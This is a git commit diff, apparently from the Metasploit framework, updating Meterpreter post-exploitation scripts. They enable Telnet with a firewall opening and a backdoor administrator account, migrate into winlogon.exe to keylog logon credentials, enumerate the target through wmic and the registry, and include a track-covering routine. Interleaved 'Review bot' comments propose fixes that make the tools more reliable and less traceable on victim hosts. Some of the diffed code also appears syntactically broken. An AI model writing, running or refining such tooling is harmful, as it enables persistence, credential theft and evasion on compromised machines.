Updated meterpreter scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6386 4d416f70-5f16-0410-b530-b9f4589650da
unstable
natron 2009-03-25 03:13:54 +00:00
parent 73e946ccf1
commit 02ab203dfd
4 changed files with 325 additions and 218 deletions


@ -1,201 +1,212 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.2
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
else
print "[*] Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
sleep(2)
prog2check = "pkgmgr.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)
found = 0
end
end
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
r.channel.close
r.close
print_status("Finnished installing the Telnet Service.")
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end


@ -34,21 +34,15 @@ captype = 0
"-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."]
)
#Function to Migrate in to Explorer process to be able to interact with desktop
def explrmigrate(session,captype)
def explrmigrate(session,captype,adm)
begin
print_status("Migrating process...")
if captype.to_i == 0
process2mig = "explorer.exe"
elsif captype.to_i == 1
# Check to make sure that process is running and system to be able to migrate to high priv process
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
process2mig = "winlogon.exe"
else
print_status("\tYou are not currently running as System to be able to migrate to winlogon.")
print_status("\tCapturing only logon user keystrokes.")
process2mig = "explorer.exe"
end
process2mig = "winlogon.exe"
else
process2mig = "explorer.exe"
end
@ -70,8 +64,10 @@ end
#Function for starting the keylogger
def startkeylogger(session)
begin
print_status("Grabbing Desktop Keyboard Input...")
session.ui.grab_desktop
print_status("Starting the keystroke sniffer...")
client.ui.keyscan_start
session.ui.keyscan_start
return true
rescue
print_status("Failed to start Keylogging!")
@ -125,8 +121,11 @@ def keycap(session, keytime, logfile)
end
db.close
rescue::Exception => e
print("\n")
print_status("#{e.class} #{e}")
db.close
print_status("Error: #{e.class} #{e}")
print_status("Stopping keystroke sniffer...")
session.ui.keyscan_stop
end
end
def helpmsg
@ -155,7 +154,8 @@ helpcall = 0
}
if helpcall == 0
if explrmigrate(session,captype)
adm = checkifadm(session)
if explrmigrate(session,captype,adm)
if startkeylogger(session)
keycap(session, keytime, logfile)
end
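Review bot: explrmigrate gains an `adm` parameter that none of the shown lines read, while the `session.sys.config.getuid == "NT AUTHORITY\\SYSTEM"` gate in front of `process2mig = "winlogon.exe"` is dropped, so captype 1 now picks winlogon.exe regardless of privilege and the migration will simply fail on a non-SYSTEM session without the old explanatory message. If checkifadm is meant to replace that check, the branch should still consult it here, e.g. `process2mig = adm ? "winlogon.exe" : "explorer.exe"` with the previous "Capturing only logon user keystrokes" notice in the fallback; the rest of explrmigrate is outside the hunk, so the gating may live there — worth confirming. In keycap's rescue, the added `db.close` also runs when the failure came from `db.close` itself or before `db` was assigned, which raises a second error inside the handler; moving the close into an `ensure` guarded on `db` being set avoids that. keycap's `begin` is outside the hunk.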


@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Verion: 0.1.0
#Note:
################## Variable Declarations ##################
session = client
@ -39,10 +39,17 @@ wmic = [
'group list',
'sysaccount list',
'volume list brief',
'logicaldisk get description,filesystem,name,size',
'netlogin get name,lastlogon,badpasswordcount',
'netclient list brief',
'netuse get name,username,connectiontype,localname',
'share get name,path',
'nteventlog get path,filename,writeable',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'product get name,version',
'qfe list'
]
################## Function Declarations ##################
@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt)
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
sleep(2)
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
@ -122,6 +141,9 @@ end
def winver(session)
stringtest = ""
verout = []
tmp = session.fs.file.expand_path("%TEMP%")
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
@ -133,7 +155,19 @@ def winver(session)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
sleep(2)
# Read the output file of the wmic commands
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
if d =~ /Windows Serverr 2008/
version = "Windows 2008"
elsif d =~ /Windows Vista/
version = "Windows Vista"
end
end
r.channel.close
r.close
elsif verout[1] == "1"
version = "Windpows 7"
end
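Review bot: winver's new wmic path writes `#{wmitmptxt}` under %TEMP% and reads it back with `type`, but never deletes it, so every run leaves a file on the target; add `session.sys.process.execute("cmd.exe /c del #{wmitmptxt}", nil, {'Hidden' => 'true'})` after the final `r.close`. The winver hunk in the fourth file of this commit has the identical omission. The fixed `sleep(2)` is also the only thing between the `/append:` write and the `type` read, unlike wmicexec in the same file which now polls for wmic.exe to exit, so a slow host reads an empty file and version stays nil. `if d =~ /Windows Serverr 2008/` reads like a typo — if the doubled r is deliberate (the ® in "Windows Server® 2008" showing up as r in the console code page), a one-line comment saying so will stop the next maintainer from "fixing" it. winver's remaining branches and `end`s are outside the hunk.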


@ -1,20 +1,21 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands.
#Windows 7 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.4
#Verion: 0.3.5
#Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for
# the code to be re-used.
#Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes)
################## Variable Declarations ##################
session = client
host,port = session.tunnel_peer.split(':')
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000))
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo )
@ -47,8 +48,12 @@ commands = [
'net group administrators',
'net view /domain',
'netsh firewall show config',
'tasklist /svc'
'tasklist /svc',
'tasklist /m'
]
# Windows 2008 Commands
win2k8cmd = [
'oclist',
]
# Commands wich MACE will be changed
cmdstomp = [
@ -65,14 +70,21 @@ cmdstomp = [
]
# WMIC Commands that will be executed on the Target
wmic = [
'computersystem list',
'computersystem list brief',
'useraccount list',
'group list',
'service list brief',
'volume list brief',
'logicaldisk get description,filesystem,name,size',
'netlogin get name,lastlogon,badpasswordcount',
'netclient list brief',
'netuse get name,username,connectiontype,localname',
'share get name,path',
'nteventlog get path,filename,writeable',
'process list brief',
'startup list full',
'rdtoggle list',
'product get name,version',
'qfe',
]
#Specific Commands for Windows vista for Wireless Enumeration
@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil)
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\wmictmp.txt"
wmiccmds.each do |wmi|
print_status "\trunning command wimic #{wmi}"
print_status "\trunning command wmic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil)
sleep(1)
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename)
session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
end
#-------------------------------------------------------------------------------
# Function for extracting program list from registry
def findprogs(session)
print_status("Extracting software list from registry")
proglist = ""
session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
proglist << "#{company}"
session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
proglist << "\t#{software}"
end
end
print_status("Finnished Extraction of software list from registry")
proglist
end
#-------------------------------------------------------------------------------
# Function that will call 2 other Functions to cover all tracks
def covertracks(session,cmdstomp)
@ -504,6 +544,9 @@ end
def winver(session)
stringtest = ""
verout = []
tmp = session.fs.file.expand_path("%TEMP%")
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
@ -515,9 +558,21 @@ def winver(session)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
sleep(2)
# Read the output file of the wmic commands
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
if d =~ /Windows Serverr 2008/
version = "Windows 2008"
elsif d =~ /Windows Vista/
version = "Windows Vista"
end
end
r.channel.close
r.close
elsif verout[1] == "1"
version = "Windpows 7"
version = "Windows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
@ -588,13 +643,20 @@ if helpopt != 1
if trgtos =~ /(Windows XP)/
filewrt(dest,list_exec(session,commands))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
dumpwlankeys(session,logs,filenameinfo)
elsif trgtos =~ /(Windows .NET Server)/
elsif trgtos =~ /(Windows 2003)/
filewrt(dest,list_exec(session,commands))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
elsif trgtos =~ /(Windows Vista)/
filewrt(dest,list_exec(session,commands + vstwlancmd))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
elsif trgtos =~ /(Windows 7)/
filewrt(dest,list_exec(session,commands + vstwlancmd))
filewrt(dest,wmicexec(session,wmic))
dumpwlankeys(session,logs,filenameinfo)
dumpwlankeys(session,logs,filenameinfo)
elsif trgtos =~ /(Windows 2000)/
filewrt(dest,list_exec(session,commands - nonwin2kcmd))
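Review bot: findprogs enumerates HKCU\Software through `create_key`, which requests write access and creates the key when it is absent, so a read-only listing can modify the target's registry and needs more privilege than a listing should; `open_key(HKEY_CURRENT_USER, 'Software', KEY_READ)` is the read-only form, and the returned handles should be closed rather than left open for each vendor subkey. The accumulated `proglist` also joins `"#{company}"` and `"\t#{software}"` without line separators, so the text written by filewrt runs together on one line. The new wmic.exe poll in wmicexec shares the unbounded-wait shape of the one in the first file of this commit.
```ruby
def findprogs(session)
  print_status("Extracting software list from registry")
  proglist = ""
  root = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software', KEY_READ)
  root.each_key() do |company|
    proglist << "#{company}\n"
    sub = session.sys.registry.open_key(HKEY_CURRENT_USER, "Software\\#{company}", KEY_READ)
    sub.each_key() { |software| proglist << "\t#{software}\n" }
    sub.close
  end
  root.close
  print_status("Finnished Extraction of software list from registry")
  proglist
end
```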